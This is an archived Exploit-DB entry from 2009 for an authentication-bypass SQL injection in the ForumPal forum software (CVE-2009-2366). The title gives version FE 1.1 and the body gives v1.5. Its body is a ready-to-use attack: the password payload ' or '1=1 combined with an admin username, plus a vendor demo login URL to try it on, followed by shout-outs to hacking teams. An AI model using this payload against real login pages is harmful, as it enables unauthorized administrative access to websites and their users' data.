ForumPal FE 1.1 Auth Bypass Remote SQL Injection Vulnerability

2009-06-26T00:00:00
ID EDB-ID:9024
Type exploitdb
Reporter ThE g0bL!N
Modified 2009-06-26T00:00:00

Description

ForumPal FE 1.1 (Auth Bypass) Remote SQL Injection Vulnerability. CVE-2009-2366. Webapps exploit for php platform

                                        
                                            --------------------------------------------------------------
ForumPal v1.5( Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.datachecknh.com
Software :ForumPal v1.5
Note: Je m'appel Tecktonik
---------------------------------------------------------------
Exploit1:
-------
Username: [Real_name_admin]
Password:' or '1=1
----------------------------------------------------------------
Dem0
----
http://www.datachecknh.com/forumpal_FE_Demo/login.asp
EXPLOIT fOR DEMO
Username: admin
Password:' or '1=1
--------------------------------------
His0k4  - Dr-HTmL And Dos-Dz TeaM aND Snakes TeaM And Ev!L-C0d3r.
-----------------------------------------------------------------

# milw0rm.com [2009-06-26]